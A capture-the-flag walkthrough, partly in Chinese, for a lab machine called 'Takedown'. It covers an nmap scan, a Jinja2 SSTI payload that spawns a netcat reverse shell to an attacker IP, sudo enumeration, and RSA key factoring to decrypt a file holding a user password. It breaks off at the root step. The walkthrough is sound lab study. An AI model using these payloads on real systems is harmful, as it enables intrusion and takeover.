Nmap
[root@Hacking] /home/kali/Takedown
❯ nmap 192.168.55.138 -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u5 (protocol 2.0)
| ssh-hostkey:
| 3072 51:fb:66:e0:d2:b6:ae:16:a9:d2:74:41:a5:b3:02:2b (RSA)
| 256 93:a0:01:6c:42:cd:26:bf:38:e5:70:fb:b8:c6:b3:fe (ECDSA)
|_ 256 77:c9:ed:41:a5:cb:30:33:08:22:88:f6:a8:28:11:8d (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Cybersecurity Inc - Secure Your Digital World
|_http-server-header: nginx/1.18.0
SSTI
进入到ticket.shieldweb.che,发现存在SSTI漏洞
{{lipsum.__globals__.__getitem__('os').popen('nc 192.168.55.4 4444 -e /bin/sh').read()}}
可以收到反弹shell,不过当前是docker环境
/script # ls -al
total 8
drwxr-xr-x 2 root root 60 Jul 31 06:34 .
drwxr-xr-x 21 root root 4096 Jul 30 13:50 ..
-rwxr-xr-x 1 root root 32 Jul 31 06:34 a.sh
/script # cat a.sh
nc 192.168.55.4 4444 -e /bin/sh
可以获取到love用户
Own mitnick
查看sudo
love@osiris:~$ sudo -l
Matching Defaults entries for love on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User love may run the following commands on osiris:
(mitnick) NOPASSWD: /home/mitnick/sas
发现似乎可以通过命令run运行一个文件
Own tomu
发现有一个公钥以及被加密的文件,猜测应该是需要破解出原文才能进行下一步
mitnick@osiris:~$ cat publickey.pub
-----BEGIN PUBLIC KEY-----
MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMov+hb0LOJW4z6w03Tv8yNswYDXkEMj
DJE46jQH3sERAgMBAAE=
-----END PUBLIC KEY-----
由于密钥很短,先获取一下n和e
[root@Hacking] /home/kali/Takedown
❯ cat a.py
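from Crypto.PublicKey import RSA

# Load the RSA public key from the PEM file and print its modulus n and
# public exponent e. `with` closes the file handle explicitly; the original
# `open(...).read()` left it to the garbage collector.
with open('publickey.pub', 'r') as fh:
    key = RSA.importKey(fh.read())
print(f'n = {key.n}')
print(f'e = {key.e}')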
[root@Hacking] /home/kali/Takedown
❯ python a.py
n = 91451963281284582263822096491513116919368195592939782118118773662653066690833
e = 65537
通过在 FactorDB 查表分解出 p 和 q
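from Crypto.PublicKey import RSA
from libnum import invmod, n2s, s2n

# Read the public key and pull out (n, e). `with` closes the handle instead
# of leaking it until garbage collection.
with open('publickey.pub', 'r') as fh:
    key = RSA.importKey(fh.read())
n = key.n
e = key.e

# Prime factors of n, obtained from FactorDB.
p = 272799705830086927219936172916283678397
q = 335234831001780341003153415948249295589
# A mistyped factor would silently yield garbage plaintext; fail early instead.
assert p * q == n, 'p * q != n: factors do not belong to this key'

# Private exponent: d = e^-1 mod phi(n), phi(n) = (p - 1)(q - 1).
d = invmod(e, (p - 1) * (q - 1))

# Read the ciphertext as a big-endian integer and apply textbook RSA.
with open('secret.enc', 'rb') as fh:
    c = s2n(fh.read())
m = pow(c, d, n)
plain = n2s(m)

# Print the raw decrypted block first (same output as before).
print(plain)
# The block looks PKCS#1 v1.5 type 2: n2s drops the leading 0x00, so it
# starts with 0x02, then non-zero padding, a 0x00 separator, then the
# message. Print just the message when that structure is present.
if plain.startswith(b'\x02') and b'\x00' in plain:
    print(plain.split(b'\x00', 1)[1])
# raw block: b'\x02\x8fx~\x04\xdc;\x19\xbd\x99\x10\x96\x00sh1m0mur4Bl4ckh4t\n'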
切换用户拿到user.txt
Root
查看sudo
tomu@osiris:~$ sudo -l
[sudo] password for tomu:
Matching Defaults entries for tomu on osiris:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tomu may run the following commands on osiris:
(root) /opt/Contempt/Contempt
运行选择第二个